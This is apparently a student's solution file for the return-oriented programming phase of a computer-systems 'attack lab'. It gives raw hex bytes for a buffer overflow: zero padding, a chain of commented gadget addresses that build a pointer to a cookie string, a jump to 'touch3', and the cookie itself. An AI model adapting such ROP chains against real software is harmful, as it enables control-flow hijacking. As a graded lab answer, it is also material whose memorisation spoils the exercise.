00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
06 1a 40 00 00 00 00 00 /* movq %rsp, %rax; #ret */
c5 19 40 00 00 00 00 00 /* movq %rax, %rdi; #nop; #ret */
ab 19 40 00 00 00 00 00 /* popq %rax; #nop; #ret */
48 00 00 00 00 00 00 00 /* The offset of cookie string in buffer */
dd 19 40 00 00 00 00 00 /* movl %eax, %edx; #nop; #ret */
34 1a 40 00 00 00 00 00 /* movl %edx, %ecx; #cmpb %cl, %cl; #ret */
13 1a 40 00 00 00 00 00 /* movl %ecx, %esi; #nop; #nop; #ret */
d6 19 40 00 00 00 00 00 /* leaq (%rdi,%rsi,1), %rax; #ret */
c5 19 40 00 00 00 00 00 /* movq %rax, %rdi; #nop; #ret */
fa 18 40 00 00 00 00 00 /* touch3 */
35 39 62 39 39 37 66 61 /* cookie (string) */
